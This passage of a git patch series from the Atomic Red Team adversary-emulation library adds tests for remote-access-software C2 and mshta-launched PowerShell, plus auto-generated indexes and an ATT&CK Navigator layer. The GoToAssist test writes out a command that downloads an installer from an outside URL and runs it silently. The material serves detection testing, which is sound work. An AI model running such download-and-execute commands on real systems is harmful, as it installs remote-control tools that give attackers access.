Expert\1702\g2ax_uninstaller_expert.exe" -ArgumentList "/uninstall /silent" -Wait -PassThru | Out-Null diff --git a/atomics/T1219/T1219.yaml b/atomics/T1219/T1219.yaml index 3231d454..9ed44514 100644 --- a/atomics/T1219/T1219.yaml +++ b/atomics/T1219/T1219.yaml @@ -55,3 +55,17 @@ atomic_tests: name: powershell elevation_required: true +- name: GoToAssist Files Detected Test on Windows + description: | + An adversary may attempt to trick the user into downloading GoToAssist and use to establish C2. Download of GoToAssist installer will be at the destination location and ran when sucessfully executed. + supported_platforms: + - windows + executor: + command: | + Invoke-WebRequest -OutFile C:\Users\$env:username\Downloads\GoToAssist.exe "https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1" + $file1 = "C:\Users\" + $env:username + "\Downloads\GoToAssist.exe" + Start-Process $file1 /S; + cleanup_command: + try{$PathToAtomicsFolder/T1219/Bin/GoToCleanup.ps1} catch{} + name: powershell + elevation_required: true \ No newline at end of file From a8dc0e3b078139db7720099e6a5528d24a73c9ea Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Tue, 27 Jul 2021 15:31:40 +0000 Subject: [PATCH 23/29] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1219/T1219.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1219/T1219.yaml b/atomics/T1219/T1219.yaml index 9ed44514..701645f1 100644 --- a/atomics/T1219/T1219.yaml +++ b/atomics/T1219/T1219.yaml @@ -56,6 +56,7 @@ atomic_tests: elevation_required: true - name: GoToAssist Files Detected Test on Windows + auto_generated_guid: 1b72b3bd-72f8-4b63-a30b-84e91b9c3578 description: | An adversary may attempt to trick the user into downloading GoToAssist and use to establish C2. Download of GoToAssist installer will be at the destination location and ran when sucessfully executed. supported_platforms: diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index c2b48803..24e525b3 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -737,3 +737,4 @@ d0eb3597-a1b3-4d65-b33b-2cda8d397f20 a538de64-1c74-46ed-aa60-b995ed302598 8b3f4ed6-077b-4bdd-891c-2d237f19410f 49eb9404-5e0f-4031-a179-b40f7be385e3 +1b72b3bd-72f8-4b63-a30b-84e91b9c3578 From 8afe7ccfd9cbb46ac49bec7f4f685d7a299ba9d8 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 27 Jul 2021 15:31:46 +0000 Subject: [PATCH 24/29] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 17 +++++++++ atomics/T1219/T1219.md | 36 +++++++++++++++++++ 6 files changed, 57 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 8d7202ba..2cd988cb 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -876,6 +876,7 @@ command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used p command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell +command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Test on Windows,1b72b3bd-72f8-4b63-a30b-84e91b9c3578,powershell command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh command-and-control,T1132.001,Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 47d624b0..b77c5810 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -538,6 +538,7 @@ command-and-control,T1571,Non-Standard Port,1,Testing usage of uncommonly used p command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell +command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Test on Windows,1b72b3bd-72f8-4b63-a30b-84e91b9c3578,powershell command-and-control,T1132.001,Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell command-and-control,T1071.001,Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index a33b6acb..79e995e2 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1590,6 +1590,7 @@ - Atomic Test #1: TeamViewer Files Detected Test on Windows [windows] - Atomic Test #2: AnyDesk Files Detected Test on Windows [windows] - Atomic Test #3: LogMeIn Files Detected Test on Windows [windows] + - Atomic Test #4: GoToAssist Files Detected Test on Windows [windows] - [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md) - Atomic Test #1: Base64 Encoded data. [macos, linux] - Atomic Test #2: XOR Encoded data. [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 5815b8eb..222179ca 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -985,6 +985,7 @@ - Atomic Test #1: TeamViewer Files Detected Test on Windows [windows] - Atomic Test #2: AnyDesk Files Detected Test on Windows [windows] - Atomic Test #3: LogMeIn Files Detected Test on Windows [windows] + - Atomic Test #4: GoToAssist Files Detected Test on Windows [windows] - [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md) - Atomic Test #2: XOR Encoded data. [windows] - T1001.002 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 0d1b19f1..33e3f3bd 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -66352,6 +66352,23 @@ command-and-control: $file1 -ErrorAction Ignore" name: powershell elevation_required: true + - name: GoToAssist Files Detected Test on Windows + auto_generated_guid: 1b72b3bd-72f8-4b63-a30b-84e91b9c3578 + description: 'An adversary may attempt to trick the user into downloading GoToAssist + and use to establish C2. Download of GoToAssist installer will be at the destination + location and ran when sucessfully executed. + +' + supported_platforms: + - windows + executor: + command: | + Invoke-WebRequest -OutFile C:\Users\$env:username\Downloads\GoToAssist.exe "https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1" + $file1 = "C:\Users\" + $env:username + "\Downloads\GoToAssist.exe" + Start-Process $file1 /S; + cleanup_command: try{$PathToAtomicsFolder/T1219/Bin/GoToCleanup.ps1} catch{} + name: powershell + elevation_required: true T1132.001: technique: external_references: diff --git a/atomics/T1219/T1219.md b/atomics/T1219/T1219.md index 58c028d8..a80908e0 100644 --- a/atomics/T1219/T1219.md +++ b/atomics/T1219/T1219.md @@ -14,6 +14,8 @@ Admin tools such as TeamViewer have been used by several groups targeting instit - [Atomic Test #3 - LogMeIn Files Detected Test on Windows](#atomic-test-3---logmein-files-detected-test-on-windows) +- [Atomic Test #4 - GoToAssist Files Detected Test on Windows](#atomic-test-4---gotoassist-files-detected-test-on-windows) +
@@ -124,4 +126,38 @@ Remove-Item $file1 -ErrorAction Ignore +
+
+ +## Atomic Test #4 - GoToAssist Files Detected Test on Windows +An adversary may attempt to trick the user into downloading GoToAssist and use to establish C2. Download of GoToAssist installer will be at the destination location and ran when sucessfully executed. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 1b72b3bd-72f8-4b63-a30b-84e91b9c3578 + + + + + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +Invoke-WebRequest -OutFile C:\Users\$env:username\Downloads\GoToAssist.exe "https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1" +$file1 = "C:\Users\" + $env:username + "\Downloads\GoToAssist.exe" +Start-Process $file1 /S; +``` + +#### Cleanup Commands: +```powershell +try{$PathToAtomicsFolder/T1219/Bin/GoToCleanup.ps1} catch{} +``` + + + + +
From 60afb02843092003687dd1cdcacec6a3926eaeb4 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Tue, 27 Jul 2021 16:55:16 +0000 Subject: [PATCH 25/29] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 24e525b3..53d1ea44 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -738,3 +738,4 @@ a538de64-1c74-46ed-aa60-b995ed302598 8b3f4ed6-077b-4bdd-891c-2d237f19410f 49eb9404-5e0f-4031-a179-b40f7be385e3 1b72b3bd-72f8-4b63-a30b-84e91b9c3578 +8707a805-2b76-4f32-b1c0-14e558205772 From 10814fa2e8184ecaff445853fd36d20c85f3abc7 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 27 Jul 2021 16:55:23 +0000 Subject: [PATCH 26/29] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 22 ++++++++++++ atomics/T1218.005/T1218.005.md | 36 +++++++++++++++++++ 6 files changed, 62 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 2cd988cb..910ab46c 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -385,6 +385,7 @@ defense-evasion,T1218.005,Mshta,6,Invoke HTML Application - Direct download from defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell +defense-evasion,T1218.005,Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index b77c5810..6a11056d 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -257,6 +257,7 @@ defense-evasion,T1218.005,Mshta,6,Invoke HTML Application - Direct download from defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell +defense-evasion,T1218.005,Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 79e995e2..271dc6af 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -662,6 +662,7 @@ - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows] - Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows] - Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows] + - Atomic Test #10: Mshta used to Execute PowerShell [windows] - [T1218.007 Msiexec](../../T1218.007/T1218.007.md) - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows] - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 222179ca..672d6010 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -470,6 +470,7 @@ - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows] - Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows] - Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows] + - Atomic Test #10: Mshta used to Execute PowerShell [windows] - [T1218.007 Msiexec](../../T1218.007/T1218.007.md) - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows] - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 33e3f3bd..3bf345c7 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -28655,6 +28655,28 @@ defense-evasion: command: 'Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_file_path}' name: powershell + - name: Mshta used to Execute PowerShell + auto_generated_guid: 8707a805-2b76-4f32-b1c0-14e558205772 + description: 'Use Mshta to execute arbitrary PowerShell. Example is from the + 2021 Threat Detection Report by Red Canary. + +' + supported_platforms: + - windows + input_arguments: + message: + description: Encoded message to include + type: string + default: Hello,%20MSHTA! + seconds_to_sleep: + description: How many seconds to sleep/wait + type: string + default: 5 + executor: + command: 'mshta.exe "about:''" + +' + name: command_prompt T1218.007: technique: id: attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336 diff --git a/atomics/T1218.005/T1218.005.md b/atomics/T1218.005/T1218.005.md index 8682f1e1..fe099523 100644 --- a/atomics/T1218.005/T1218.005.md +++ b/atomics/T1218.005/T1218.005.md @@ -30,6 +30,8 @@ Mshta.exe can be used to bypass application control solutions that do not accoun - [Atomic Test #9 - Invoke HTML Application - Simulate Lateral Movement over UNC Path](#atomic-test-9---invoke-html-application---simulate-lateral-movement-over-unc-path) +- [Atomic Test #10 - Mshta used to Execute PowerShell](#atomic-test-10---mshta-used-to-execute-powershell) +
@@ -423,4 +425,38 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +
+
+ +## Atomic Test #10 - Mshta used to Execute PowerShell +Use Mshta to execute arbitrary PowerShell. Example is from the 2021 Threat Detection Report by Red Canary. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 8707a805-2b76-4f32-b1c0-14e558205772 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| message | Encoded message to include | string | Hello,%20MSHTA!| +| seconds_to_sleep | How many seconds to sleep/wait | string | 5| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +mshta.exe "about:'" +``` + + + + + +
From 33f020e2a39e78e1e15147b6a02653a401d96382 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 27 Jul 2021 16:56:42 +0000 Subject: [PATCH 27/29] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-macos.json | 2 +- atomics/Indexes/Indexes-Markdown/index.md | 16 +++++------ .../Indexes/Indexes-Markdown/linux-index.md | 16 +++++------ atomics/Indexes/index.yaml | 28 ++++++++----------- atomics/T1053.007/T1053.007.md | 4 +-- atomics/T1552.007/T1552.007.md | 2 +- atomics/T1609/T1609.md | 2 +- 7 files changed, 32 insertions(+), 38 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json index 09dc27c0..0a95a5d3 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},